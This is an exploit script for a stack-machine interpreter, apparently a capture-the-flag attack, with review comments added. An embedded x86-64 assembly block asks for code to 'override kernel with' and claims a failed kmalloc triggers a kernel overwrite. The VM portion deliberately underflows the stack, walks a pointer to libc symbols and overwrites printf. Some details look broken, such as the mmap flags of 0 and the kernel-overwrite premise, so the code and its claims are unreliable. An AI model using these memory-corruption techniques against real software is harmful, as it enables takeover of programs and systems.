# Stack = 0x2020A0
#
# NOTE(review): this file is a script for a stack-machine interpreter with an
# x86-64 Linux syscall sequence embedded between ASM / ENDASM.  The VM opcodes
# used after ENDASM (pop, store, fetch, swap, neg, add, writed) are not defined
# in this file; their meaning below is taken only from the author's own
# comments and should be confirmed against the interpreter.  Bare numbers in
# the VM part are values pushed on the VM stack, not instructions.
0 # padding
ASM
# Intel operand order (dst, src) with `[rip + sym]` addressing and `.string`,
# i.e. GAS-style intel syntax; `#` starts a comment here as in the VM part.
# Syscall convention used here: number in eax, result in rax (negative = -errno);
# `syscall` itself clobbers rcx and r11.
mov edi, 1 # fd 1 (stdout)
lea rsi, [rip + prompt] # RIP-relative address of the prompt text (position-independent)
mov edx, promptend - prompt # length derived from the two labels below
mov eax, 1 # Write (syscall 1)
syscall
mov ecx, eax # copy of the write result; rcx was clobbered by syscall anyway
cmp ecx, 0
jl exit # negative result: treat as error and leave
# Mmap a chunk of memory that will "just fit" in the allocator.
mov edi, 0 # addr
mov esi, 0x1400000 # len
mov edx, 7 # prot
mov ecx, 0 # flags
mov r8d, -1 # fd
mov r9d, 0 # seek
mov eax, 9 # syscall 9 = mmap
syscall
mov edi, eax # note: edi is reloaded below before it is used
cmp eax, -0xfff # unsigned compare on the low 32 bits of the result only
jae exit # low dword in the -errno range: give up
# Issue a read syscall. When kernel tries to allocate this temp buffer,
# kmalloc will fail and return 0x00000000 (or the kernel base) instead,
# causing a kernel overwrite!
mov edi, 0 # fd 0 (stdin)
mov rsi, rax # full 64-bit mmap result used as the read buffer
mov edx, 0x1000000 # len
mov eax, 0 # Read (syscall 0)
syscall
mov edi, eax # becomes the exit status if the check below fails
cmp eax, 0
jl exit
# Our overwrite will modify the syscall handler. So trigger bug
syscall # rax still holds the read result, i.e. the byte count is used as the syscall number here
# This never gets reached.
hlt
prompt:
.string "Please enter code to override kernel with:"
promptend:
exit:
mov eax, 60 # exit (syscall 60); status taken from edi
syscall
ENDASM
pop
# Okay cause stack underflow
1
neg
swap # cause a stack underflow, and swap with stack ptr
pop
pop
# Store the pointer to stdin
#writed
#writed
0
store # slot 0 (per the comment above: half of the stdin pointer -- confirm against the VM)
1
store # slot 1
# Note that stdin is now clobbered!
# The following run of pops walks the pointer; the counts are tuned to the
# layout the author describes in the comments, nothing in this file verifies them.
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
# Now our pointer is at __ctype_b_loc
pop
pop
pop
pop
pop
pop
pop
pop
# Pointer is at __stack_chk_fail with offset 0x7b6
2 # HI
store
3 # LO
store
# Calculate stack: LO + 0x2020a8 - 0x7b6
3
fetch
2103538 # == 0x2020a8 - 0x7b6, matching the comment above
add
3
store
# Move pointer to printf
0
0
0
0
# Override printf
3
2
fetch
pop
fetch
writed
#writed
#writed